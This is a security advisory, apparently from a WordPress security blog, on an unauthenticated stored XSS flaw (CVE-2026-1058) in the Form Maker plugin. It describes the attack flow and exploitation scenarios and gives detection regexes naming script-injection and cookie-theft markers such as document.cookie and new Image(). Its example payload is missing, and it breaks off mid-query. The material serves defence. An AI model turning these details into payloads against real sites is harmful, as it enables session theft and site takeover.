Urgent Security Advisory — Unauthenticated Stored XSS in Form Maker by 10Web (≤ 1.15.35)

Author: Hong Kong Security Expert • Published: 2026-02-06 • Tags: WordPress, XSS, Form Maker, 10Web, CVE-2026-1058

Summary: A stored, unauthenticated Cross‑Site Scripting (XSS) vulnerability (CVE‑2026‑1058) affects Form Maker by 10Web plugin versions ≤ 1.15.35. The vendor released 1.15.36 to address the issue. This advisory provides detection, mitigation, and remediation steps — plus immediate virtual patching guidance you can apply via a WAF or equivalent edge filter.

Executive summary

On 6 February 2026 a stored XSS vulnerability was disclosed in the Form Maker by 10Web WordPress plugin (CVE‑2026‑1058). Versions up to and including 1.15.35 are affected. The vendor released version 1.15.36 to address the flaw.

• Vulnerability type: Stored Cross‑Site Scripting (XSS)
• Affected versions: ≤ 1.15.35
• Fixed in: 1.15.36
• CVE: CVE‑2026‑1058
• CVSS base score (example): 7.1 (Medium/High depending on context)
• Attack vector: Unauthenticated, stored
• Impact: Session theft, privilege escalation (if payload executes in admin context), arbitrary JavaScript execution, unauthorized actions

Because the vulnerability is unauthenticated and involves stored content, it can be weaponised to affect administrators, content editors, or site visitors depending on rendering context. Treat any production or staging site using Form Maker as high priority for remediation.

How this vulnerability works (technical overview)

The plugin accepted and persisted form-submitted data (including hidden fields) without proper sanitisation/escaping before rendering it in admin or frontend views. When that stored content is displayed unescaped, a JavaScript payload executes in the viewer’s browser.

Typical attack flow:

1. Attacker submits a form containing a hidden field value with a JavaScript payload (example shown escaped):

2. The plugin stores the payload in the database alongside the submission.
3. When an administrator or other user opens the submissions list, preview, or any detail view that renders the stored hidden field value unescaped, the payload executes in the user’s browser context.
4. Consequences include session cookie theft, CSRF-style actions executed under admin sessions, persistent malicious content insertion, or pivoting to a full site compromise.

Because no authentication is required to submit the form, an attacker can inject payloads at scale and wait for legitimate viewing to trigger execution.

Realistic exploitation scenarios

• Social engineering: Multiple malicious submissions followed by a targeted phishing message to lure an admin to the submissions list.
• Automated mass attack: Botnets scan for sites with the plugin, enumerate public forms, and inject payloads into hidden fields en masse.
• Public posts: If submissions are displayed publicly (testimonials, reviews), any visitor could trigger the stored payload.

The gravest outcome is payload execution in an admin context — this can enable account takeover, creation of backdoors, or modifications to themes/plugins.

Indicators of compromise (IoCs) to look for

Search your site and database for injected scripts or suspicious content. Start with these places:

• Database fields and plugin tables that store submissions
• wp_posts, wp_postmeta, wp_comments, wp_options for any stored HTML containing
• (?i)on\w+\s*=\s*["']?[^"'>]+["']? (event handlers)
• (?i)javascript: (javascript: URLs)
• (?i)data:text/html (data URLs)
• Encoded patterns: %3Cscript%3E, \\x3cscript\\x3e, eval\(, document\.cookie, new Image\(

Example search:

SELECT * FROM wp_postmeta WHERE meta_value REGEXP '